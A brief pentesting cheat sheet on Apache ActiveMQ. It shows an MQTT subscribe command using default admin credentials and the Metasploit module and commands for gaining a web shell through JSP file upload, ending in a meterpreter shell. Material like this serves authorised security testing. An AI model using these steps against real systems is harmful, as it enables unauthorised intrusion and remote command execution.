Apache ActiveMQ Pentesting
Last modified: 2023-02-23
Apache ActiveMQ is a message broker written in Java together with a full Java Message Service client.
Interaction with MQTT
If the MQTT server is runnong on the target system, we can subscribe/publish to a topic in ActiveMQ using MQTT client.
Subscribe to a Topic
# -h: Host # -t: Topic name # -V: MQTT protocol version (5, 31, 311) mosquitto_sub -h example.com -u admin -P admin -t 'example/topic' -V 31
Web Shell by File Upload JSP
ActiveMQ is vulnerable to web shell via file upload an arbitrary JSP file.
msfconsole msf> use exploit/multi/http/apache_activemq_upload_jsp msf> set ... msf> run meterpreter> shell